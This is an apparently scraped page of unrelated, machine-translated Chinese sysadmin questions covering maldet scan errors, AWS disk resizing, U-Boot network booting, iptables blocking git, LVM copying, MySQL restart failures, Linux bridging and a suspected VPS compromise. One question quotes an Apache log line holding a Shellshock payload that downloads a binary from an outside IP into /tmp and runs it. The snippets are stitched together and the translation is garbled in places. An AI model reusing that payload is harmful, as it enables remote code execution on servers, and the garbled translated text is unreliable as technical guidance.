所以我已经安装了Linux Malware Detect(maldet)来扫描一个服务器,一切都安装正常,但是当我运行它时,我得到一个错误。 一堆错误和扫描只是closures它。 这里是我运行maldet扫描特定文件夹的命令: sudo maldet -a /opt/lampp/ Linux Malware Detect v1.5 (C) 2002-2014, R-fx Networks <[email protected]> (C) 2014, Ryan MacDonald <[email protected]> This program may be freely redistributed under the terms of the GNU GPL v2 maldet(4954): {scan} signatures loaded: 10728 (8824 MD5 / 1904 HEX / 0 USER) maldet(4954): {scan} building file list […]
我有一个服务器与debian 7.我正在检查Apache的错误日志文件,看到这样的几行 [Fri Mar 20 04:56:48 2015] [error] [client 222.66.95.253] client denied by server configuration: /home/username/www/, referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bbce >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bbce >> /tmp/Run.sh;echo /tmp/China.Z-bbce >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh" [Mon Mar 16 […]
我正在使用AWS启动一个RHEL64实例,但磁盘无法resize以适合我select的卷。 以下是这种情况:我从市场AMI ami-517eec6b(这是RedHat批准的RHEL64映像)启动正在运行的实例,然后select卷大小为30GB。 实例成功启动但是fdisk和df输出不匹配。 即df显示文件系统报告只有8GB(默认大小) $ df -h 使用的文件系统大小可用使用% / dev / xvda1 5.7G 2.3G 3.4G 41%/ 无1.8G 0 1.8G 0%/ dev / shm fdisk显示的音量是正确的30GB。 $ sudo fdisk -l 磁盘/ dev / xvda:32.2 GB,32212254720字节 4个磁头,32个扇区/磁道,491520个磁道 单位= 128 * 512 = 65536字节的柱面 扇区大小(逻辑/物理):512字节/ 512字节 I / O大小(最小/最佳):512字节/ 512字节 磁盘标识符:0x00072e87 设备引导启动结束块Id系统 / dev / xvda1 1 93750 […]
我有一个后端应用程序正在我们的服务器上托pipe的开发人员内部使用,但是,不幸的是,该应用程序需要使用Passenger和Ruby,而这两者都非常需要内存。 我有一个SSD交换文件,应该允许我们的使用合理的性能,我想强制这个应用程序使用交换空间,并留下内存打开我们的前置应用程序。 所以问题是,有没有办法强制一个进程/用户(这个进程在特定的用户下运行)尽可能地使用交换空间? 我认为limits.conf可能是有能力的,但我不希望它给内存错误,只需切换到交换文件。
我们正在与几台单板电脑(SBC)合作。 我们使用Yocto(使用U-boot作为引导程序)生成Linuxembedded式映像,并将其手动部署到SD卡上。 目前这种情况很好,当我们处于testing阶段,没有太多的SBC。 但是后来肯定会太慢 我们有一个SBCnetworking的中央服务器。 目前,这是一个简单的DHCP服务器,根据卡的MAC地址,影响IP地址。 首先,我们曾经想过创build一个PXE服务器,但是似乎某些SBC的内部启动ROM加载器(例如飞思卡尔i.MX6)不支持PXE启动过程。 所以我们只想在卡上加载u-boot,然后使用脚本(boot.scr)来下载所有需要的(zImage,dtb和rootfs)来启动。 我们不想使用NFS(没有瘦客户机,我们希望所有必要的都可以下载到卡上)。 目前,我们可以使用这个下载内核和dtb文件: U-Boot > dhcp ${image}; tftpboot ${fdt_addr} ${fdt_file} ; fdt addr ${fdt_addr} U-Boot > bootz ${loadaddr} – ${fdt_addr} 当然,因为没有rootfs,内核的启动以kernel panic结束。 但是我们不知道如何下载rootfs并使用它来创build内核。 任何build议如何做到这一点是值得欢迎的。 谢谢。
对不起,我是这个服务器的新东西,如此裸露,如果我错过任何信息让我知道! 我试图设置我的Ubuntu 14.04.2 LTS服务器有一个坚实的iptables防火墙。 现在我认为它是相当不错的,但是,当iptables处于活动状态时,我无法在服务器上执行任何git …因此,解决方法是closures防火墙,执行pull操作,然后重新激活防火墙。 这很烦人,并引入了人为的错误,不重新打开防火墙。 我从几个资源做了我的iptables,并从这里git规则: http : //www.nigeldunn.com/2011/06/29/iptables-rules-to-allow-git/ 我试图把日志logging,看看哪些数据包被git pull阻塞,但没有出现在/var/log/kern.log(尽pipe其他东西login在那里无关,所以我知道它的工作)。 当做一个混帐拉我得到这个: ssh: Could not resolve hostname equity1.projectlocker.com: Name or service not known fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. 这是我的iptablesconfiguration: #!/bin/sh echo "Flushing iptable rules" iptables -F iptables -t […]
我有一个关于将LVM分区复制到新磁盘的问题。 我想共同复制不移动数据。 我的操作系统是Debian。 在LVM分区上,我已经运行Xen虚拟系统。 有关使用LVM(/ dev / sdb)的磁盘信息: root@server:/# fdisk -l /dev/sdb Disk /dev/sdb: 1000.2 GB, 1000204886016 bytes 255 heads, 63 sectors/track, 121601 cylinders, total 1953525168 sectors Units = sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: […]
在尝试将MySQL服务器时区更改为CDT以与Centos系统时间匹配时,出现了一些问题。 我编辑了以root身份login到SSH的vim中的/etc/ in中的my.conf ,并将其保存。 在service mysql restart ,我得到了以下错误: root@server [~]# service mysql restart ERROR! MySQL server PID file could not be found! Starting MySQL. ERROR! The server quit without updating PID file (/var/lib/mysql/server.find-minecraft-servers.com.pid). root@server [~]# 这不断循环。 我试过find那个pid文件 – 这不是显卡。 我试过service mysql status ,它提到/ var / lock / subsys / mysql中的locking文件 – 我删除这个,没有任何改变。 请帮我一下 my.conf的内容是: [mysqld] […]
我对网桥的理解是有一种“虚拟交换机”,虚拟连接networking设备(添加到网桥),就像我将它们连接到一个真正的交换机与电缆…但一定是错误的这种类比,由于某种原因,我需要在桥设备上设置我的IP地址。 例 例如,让我们进行以下设置:我有一台机器充当多个虚拟机(拥有自己的虚拟networking设备vnet0,vnet1,vnet2,…)的主机。 这台机器有一个物理networking接口eth0,我想用它来为所有的虚拟机和我的主机与外界通信。 因为我的主机应该有一个IP地址,所以我会认为我应该在eth0上configuration这个IP(inkl.default gateway,DNS servers,…)。 然后,我将创build一个桥br0,并将所有接口(eth0,vnet0,vnet1,vnet2,..)添加到该桥。 这不起作用… 相反,我需要将网桥br0configuration为具有我主机的IP地址(也configuration了默认网关和DNS服务器),然后将所有接口(eth0,vnet0,vnet2,…)添加到网桥br0 。 那么…这个工作。 但我实际上想知道为什么定义IP到eth0不起作用。 我似乎错过了一些如何实际工作的基本知识。 所以我会很高兴,如果有人能解释我什么是错的。 我通常想真正理解这些事情是如何工作的。 所以我会很高兴,如果你要详细的协议。
这些天我的主机(a2hosting)与托pipe我的VPS的节点有问题,在此期间,我的用户注意到一个奇怪的行为,而不是在节点上出现问题时发生的几次重新启动。 这一切都开始时,我的一些网站用户联系我说,他们在网站上看到不同的图像(完全随机图像,不涉及我的网站),因为我不在家我closures从我的主机控制面板的服务器,担心黑客攻击。 几个小时后,我的用户告诉我服务器重新启动了(尽pipe我没有提到),而且我的用户说清除caching后他们没有看到他们的图像有什么问题了。 我一读到这个就closures它,甚至更害怕黑客攻击(但由于没有更改密码而感到困惑) 最后,当我回家时,我再次启动服务器,并检查日志。 没有可疑的日志活动,没有人login除了我之外的服务器,没有文件(我告诉那些不同的文件)已经改变。 唯一奇怪的是: 我有2个apache日志文件,称为20150518-access.log和20150517-access.log(和我有一些datedate5月18日在其他日志,如上所述),这意味着我的系统临时有5月18日为date现在已经回到四月了,而且它自己也改变了)。 我的一些日志将这个http://mjzone.net/Files/lognull.png作为重新启动之后的日志条目 我已经做了一些检查,我的系统似乎很好,没有比我的访问,没有发现可疑文件(甚至没有我被告知的图像是不同的),我花了我所有的星期天检查可疑的活动,但我找不到任何。 所以,我已经打开了一个主机上的票,他们说,他们不能给我任何信息,但它更有可能是一个安全漏洞,而不是一个问题挂钩节点问题(除了重新启动,他们证实这是一个问题在他们身边),但老实说我不相信…虽然我可以想到自动重新启动和暂时更改的date之间的联系,我找不到任何相关的图像(这是唯一的这让我想到了一个安全问题,虽然我不能想到黑客会改变一堆随机图像和服务器date,但是然后恢复一切回来)。 我的问题是: 有什么方法可以让人们看到随机图像,而不是实际的图像可能会链接到服务器/节点的问题,而不是安全漏洞? 除了系统日志和最近更改的文件以外,还能检查什么,以确保没有什么奇怪的事情发生?